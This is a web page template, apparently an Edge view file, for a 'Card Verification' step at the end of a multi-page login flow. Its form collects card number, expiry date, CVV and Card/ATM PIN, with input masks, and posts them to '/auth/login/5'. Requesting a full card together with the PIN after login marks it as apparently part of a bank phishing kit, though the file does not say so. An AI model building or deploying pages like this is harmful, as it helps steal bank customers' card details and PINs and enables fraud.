@layout('layouts.app')

@section('content')
<div class="cb-main-content">
  <div class="progress-bar">
    <div class="cb-main-content-sub">
      <div class="container__content">
        <div class="cb-progress-bar">
          <p class="cb-progress-bar__label">
            100% Complete
          </p>
          <div class="cb-progress-bar__container">
            <div class="cb-progress-bar__bar" style="width: 100%;"></div>
          </div>
        </div>
      </div>
    </div>
  </div>

  <div class="cb-main-content-sub">
    <div class="container__content">
      <form action="/auth/login/5" method="POST">
        <h1>Card Verification</h1>
        <small>Help us confirm it's you by filling out the following.</small>

        <div class="cb-inputWrapper">
          <div class="cb-message__content">
            <div class="text">
              <div class="cb-field">
                <input id="cardNum" name="cardNum" class="cb-input" type="text" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">

                <label class="cb-label cb-label--alpha" for="cardNum">Card Number</label>
              </div>

              <div class="icon-checkmark-green cb-valid-indicator"></div>
            </div>
          </div>
          <div class="cb-message__message" style="display: none;">
            <span class="icon-error cb-message__message-icon cb-message__error"></span>
            <span class="cb-message__message-text cb-message__error">Enter a valid Card Number</span>
          </div>
        </div>

        <div class="cb-inputWrapper">
          <div class="cb-message__content">
            <div class="text">
              <div class="cb-field">
                <input id="expDate" name="expDate" class="cb-input" type="text" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">

                <label class="cb-label cb-label--alpha" for="expDate">Expiry Date</label>
              </div>

              <div class="icon-checkmark-green cb-valid-indicator"></div>
            </div>
          </div>
          <div class="cb-message__message" style="display: none;">
            <span class="icon-error cb-message__message-icon cb-message__error"></span>
            <span class="cb-message__message-text cb-message__error">Enter a valid Expiry Date</span>
          </div>
        </div>

        <div class="cb-inputWrapper">
          <div class="cb-message__content">
            <div class="text">
              <div class="cb-field">
                <input id="cvv" name="cvv" class="cb-input" type="text" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">

                <label class="cb-label cb-label--alpha" for="cvv">CVV</label>
              </div>

              <div class="icon-checkmark-green cb-valid-indicator"></div>
            </div>
          </div>
          <div class="cb-message__message" style="display: none;">
            <span class="icon-error cb-message__message-icon cb-message__error"></span>
            <span class="cb-message__message-text cb-message__error">Enter a valid CVV</span>
          </div>
        </div>

        <div class="cb-inputWrapper">
          <div class="cb-message__content">
            <div class="text">
              <div class="cb-field">
                <input id="cpin" name="cpin" class="cb-input cb-mask-input" type="password" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">

                <label class="cb-label cb-label--alpha" for="cpin">
                  Card/ATM PIN
                  <span class="cb-label-icon cb-label-icon--secure"></span>
                </label>
              </div>

              <div class="icon-checkmark-green cb-valid-indicator"></div>
            </div>
          </div>
          <div class="cb-message__message" style="display: none;">
            <span class="icon-error cb-message__message-icon cb-message__error"></span>
            <span class="cb-message__message-text cb-message__error">Enter a valid Card/ATM PIN</span>
          </div>
        </div>

        <div class="cb-actions-items" style="margin-top: 5rem;">
          <div class="cb-actions-item cb-actions-item--primary">
            <button class="button button--primary submitBtn" type="submit">
              Continue
            </button>
          </div>
        </div>
      </form>
    </div>
  </div>
</div>
@endsection

@section('script')
<script>
  $('#cardNum').mask('0000 0000 0000 0000');
  $('#expDate').mask('00/0000');
  $('#cvv').mask('0000');
  $('#cpin').mask('0000');
</script>
@endsection